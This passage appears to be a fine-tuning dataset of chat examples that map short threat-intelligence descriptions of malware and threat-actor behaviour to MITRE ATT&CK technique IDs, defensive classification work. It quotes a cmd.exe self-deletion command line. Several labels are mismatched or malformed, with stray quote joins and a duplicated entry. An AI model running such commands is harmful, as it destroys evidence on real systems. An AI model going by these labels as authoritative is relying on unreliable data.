\"ID# - Technique\". " }, { "role": "user", "content": "CharmPower can exfiltrate gathered data to a hardcoded C2 URL via HTTP POST." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The script variant of the Helminth Trojan consists of a VBScript and PowerShell script named update.vbs and dns.ps1. We aptly named this variant the script version, as we found another version of this Trojan that we will discuss later in this Appendix" }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Before being appended to image files, commands are encrypted with a key composed of both a hard-coded value and a string contained on that day's tweet. To decrypt the commands, an investigator would need access to the intended malware sample, the day's tweet, and the image file containing the command." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "enumerates the current network connections similar to net use ." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sandworm Team has used dedicated network connections from one victim organization to gain unauthorized access to a separate organization." }, { "role": "assistant", "content": "T1199 - Trusted Relationship" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can use HTTP or HTTPS for command and control to hard-coded C2 servers." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In particular, the threat actors have exploited CVE-2011-3544, a vulnerability in the Java Runtime Environment, to deliver the HttpBrowser backdoor; and CVE-2010-0738, a vulnerability in JBoss, to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code" }, { "role": "assistant", "content": "T1068 - Exploitation for Privilege Escalation', 'T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT12 has used the RIPTIDE RAT, which communicates over HTTP with a payload encrypted with RC4." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used macros in Word documents that would download a second stage if executed." }, { "role": "assistant", "content": "T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CharmPower can send additional modules over C2 encoded with base64." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MURKYTOP has the capability to retrieve information about users on remote hosts." }, { "role": "assistant", "content": "T1087.001 - Account Discovery: Local Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Prior to 2014, IRON LIBERTY used custom malware, primarily Sysmain, Havex, and xFrost (now known as Karagany), combined with commodity penetration testing and tools" }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Bazar loader is used to download and execute the Bazar backdoor." }, { "role": "assistant", "content": "T1104 - Multi-Stage Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After initialization, SUNSPOT monitors running processes for instances of MsBuild.exe, which is part of Microsoft Visual Studio development tools. Copies of MsBuild.exe are identified by hashing the name of each running process and comparing it to the corresponding value, 0x53D525. The hashing algorithm used for the comparison is ElfHash and is provided in Python in Figure 1" }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sharpshooter downloaded additional payloads after a target was infected with a first-stage downloader." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A module in Prikormka collects information about the paths, size, and creation time of files with specific file extensions, but not the actual content of the file." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "However, what happened was that the actor resized the Certificate Table in the digitally signed ‘vac.dll’ and inserted their own data in the Certificate Table so it doesn’t affect the digital signature" }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has maintained persistence by loading malicious code into a startup folder or by adding a Registry Run key." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Encoded Payload Decoded Payload MD5 Size Import Hash Exported Function Version aa3f303c3319b14b4829fe2faa5999c1 322164 182ee99b4f0803628c30411b1faa9992 l7MF25T96n45qOGWX 5.3.2 126067d634d94c45084cbe1d9873d895 330804 5f45532f947501cf024d84c36e3a19a1 hJvTJcdAU3mNkuvGGq7L 5.4.1 fce54b4886cac5c61eda1e7605483ca3 345812 c1942a0ca397b627019dace26eca78d8 WcuH 5.4.1 Table 2: Static characteristics of UPPERCUT Another new feature in the latest UPPERCUT sample is that the malware sends an error code in the Cookie header if it fails to receive the HTTP response from the command and control (C2) server" }, { "role": "assistant", "content": "T1132 - Data Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ShimRat can impersonate Windows services and antivirus products to avoid detection on compromised systems." }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This technique allows them to map network resources and make lateral movements inside the network, landing in the perfect machine to match the attacker’s interest" }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The BazarLoader ISO downloaded from the OneDrive link, consists of a malicious DLL and shortcut file named “Documents.lnk” which executes the DLL via rundll32.exe." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ke3chang has used network scanning and enumeration tools, including Ping." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "InvisiMole can list information about files in a directory and recently opened or used documents. InvisiMole can also search for specific files by supplied file mask." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "creates a backdoor through which remote attackers can upload files." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer', 'T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BRONZE BUTLER has used a batch script that adds a Registry Run key to establish malware persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation CuckooBees, the threat actors renamed a malicious executable to `rundll32.exe` to allow it to blend in with other Windows system files." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DnsSystem can upload files from infected machines after receiving a command with `uploaddd` in the string." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MuddyWater has exploited the Microsoft Netlogon vulnerability (CVE-2020-1472)." }, { "role": "assistant", "content": "T1210 - Exploitation of Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Tropic Trooper has used Windows command scripts." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stuxnet enumerates user accounts of the domain." }, { "role": "assistant", "content": "T1087.002 - Account Discovery: Domain Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has been loaded through DLL side-loading of a legitimate Citrix executable that is set to persist through the registry run key location: HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ssonsvr.exe" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 has sent spearphishing emails with a malicious executable disguised as a document or spreadsheet." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Many samples can perform UAC bypass by using eventvwr.exe to execute a malicious file." }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ixeshe can download and execute additional files." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SynAck checks its directory location in an attempt to avoid launching in a sandbox." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery', 'T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Metamorfo has used raw TCP for C2." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turla attempted to trick targets into clicking on a link featuring a seemingly legitimate domain from Adobe.com to download their malware and gain initial access." }, { "role": "assistant", "content": "T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware sets its persistence mechanism by creating a RunKey in the registry to ensure its survival after system reboot events" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mustang Panda have acquired C2 domains prior to operations." }, { "role": "assistant", "content": "T1583.001 - Domains" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We were able to expand on some of the findings about the group and provide insights into the additional variants that it uses. We were able to trace the implant back to at least 2015, where it also had variants intended to hijack the execution of the Telegram and Chrome applications as a persistence method" }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QUADAGENT uses cmd.exe to execute scripts and commands on the victim’s machine." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SMOKEDHAM (127bf1d43313736c52172f8dc6513f56) is a .NET-based backdoor that supports commands, including screen capture and keystroke capture. The backdoor may also download and execute additional PowerShell commands from its command and control (C2) server" }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MechaFlounder has the ability to send the compromised user's account name and hostname within a URL to C2." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "runs the whoami and query user commands." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CTU researchers observed WCry variants demanding Bitcoin payments equivalent to $300 and $600. The Bitcoin address is provided in the c.wnry configuration file and can vary across samples. If no configuration file is present, the malware uses a hard-coded Bitcoin address. CTU researchers have identified the following Bitcoin addresses associated with the WCry ransomware" }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Earth Lusca has sent spearphishing emails that required the user to click on a malicious link and subsequently open a decoy document with a malicious loader." }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "communicates to the C2 server by retrieving a Google Doc." }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Calisto uses a hidden directory named .calisto to store data from the victim’s machine before exfiltration." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging', 'T1564.001 - Hide Artifacts: Hidden Files and Directories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used various forms of spearphishing attempting to get a user to open links or attachments." }, { "role": "assistant", "content": "T1204 - User Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turla has used spearphishing via a link to get users to download and run their malware." }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Zebrocy Trojan gathers system specific information that it will send to the C2 server via an HTTP POST request to the above URL. Like other Zebrocy samples, this Trojan collects system specific information it will send to the C2 server by running the command SYSTEMINFO & TASKLIST on the command line and by enumerating information about connected storage devices. This specific variant of Zebrocy will also send a screenshot of the victim host as a JPEG image to the C2 server" }, { "role": "assistant", "content": "T1113 - Screen Capture', 'T1057 - Process Discovery', 'T1120 - Peripheral Device Discovery', 'T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Industroyer’s data wiper module writes zeros into the registry keys in \"SYSTEM\\CurrentControlSet\\Services\" to render a system inoperable." }, { "role": "assistant", "content": "T1489 - Service Stop" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "XCSSET uses a malicious browser application to replace the legitimate browser in order to continuously capture credentials, monitor web traffic, and download additional modules." }, { "role": "assistant", "content": "T1554 - Compromise Host Software Binary" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ServHelper uses HTTP for C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hi-Zor has the ability to create a reverse shell." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A module in collects information from the victim about its IP addresses and MAC addresses." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "injects into the svchost.exe process." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TeamTNT has checked for running containers with \"docker ps\" and for specific container names with \"docker inspect\". TeamTNT has also searched for Kubernetes pods running in a local network." }, { "role": "assistant", "content": "T1613 - Container and Resource Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lucifer can use system resources to mine cryptocurrency, dropping XMRig to mine Monero." }, { "role": "assistant", "content": "T1496 - Resource Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has extracted files from compromised networks." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "cmd.exe /C choice /C Y /N /D Y /T 2 & Del After sleeping, the Trojan will create a GUID and write it to %APPDATA%\\Windows\\GDI.bin" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 2: De-obfuscated code scheduling the second task to run a script embedded in a blog page The last section of script embedded in 29[.]html then downloads Revenge RAT and injects the binary into the memory of a running process, as seen in Figure 3" }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POWERSTATS can retrieve usernames from compromised hosts." }, { "role": "assistant", "content": "T1087.001 - Account Discovery: Local Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Threat Group-3390 has obtained and used tools such as Impacket, pwdump, Mimikatz, gsecdump, NBTscan, and Windows Credential Editor." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PUPY LOADER The Pupy RAT comes packaged by default with loaders that can run the RAT on a variety of platforms such as Windows, macOS, Linux and Android" }, { "role": "assistant", "content": "T1571 - Non-Standard Port', 'T1043 - Commonly Used Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QuietSieve can identify and search networked drives for specific file name extensions." }, { "role": "assistant", "content": "T1135 - Network Share Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TrickBot downloads several additional files and saves them to the victim's machine." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT39 has utilized tools to capture mouse movements." }, { "role": "assistant", "content": "T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For the rest, we acknowledge that the subdomains used could be indicative of the target; they could also be used to go after third parties that might trust those organizations" }, { "role": "assistant", "content": "T1583.001 - Domains" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HiddenWasp uses a script to automate tasks on the victim's machine and to assist in execution." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "txt,log} and is also a \"cryptojacker,\" which is a tool that uses a victim’s computer to mine cryptocurrency. Nirsoft SniffPass is capable of obtaining passwords sent over non-secure protocols" }, { "role": "assistant", "content": "T1040 - Network Sniffing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": ". . Once the second stage is extracted and run, we are presented with the final stage of this attack, which we refer to as ComboJack. Once ComboJack is extracted it begins by copying itself to the following location:" }, { "role": "assistant", "content": "T1587.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Agent Tesla has the ability to use form-grabbing to extract data from web data forms." }, { "role": "assistant", "content": "T1185 - Browser Session Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used spearphishing via a link to get users to download and run their malware." }, { "role": "assistant", "content": "T1204 - User Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Volgmer can list directories on a victim." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bankshot uses the command-line interface to execute arbitrary commands." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PlugX adds Run key entries in the Registry to establish persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As mentioned, FALLCHILL was reported as the final payload for Celas Trade Pro. All FALLCHILL samples use 16-byte hardcoded RC4 keys for sending data, similar to the 16-byte keys in the AppleJeus samples" }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Tomiris has the ability to collect recent files matching a hardcoded list of extensions prior to exfiltration." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Elderwood has leveraged multiple types of spearphishing in order to attempt to get a user to open attachments." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Felismus uses HTTP for C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WIRTE has used Base64 to decode malicious VBS script." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "To check the host language, it queries the registry key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Nls\\Language\\ and the value InstallLanguage. If the machine has the value 0419 (Russian), 0422 (Ukrainian) or 0423 (Belarusian), it call ExitProcess to stop executing" }, { "role": "assistant", "content": "T1614.001 - System Location Discovery: System Language Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "One of the Cl0p variants encrypts the files by generating an RSA public key, retrieving its first 127 bytes and using them as the RC4 key, adding the Cl0p^_- header and the RC4 encrypting it again. Once the files are encrypted, the Cl0p extension will be added to each encrypted file" }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, 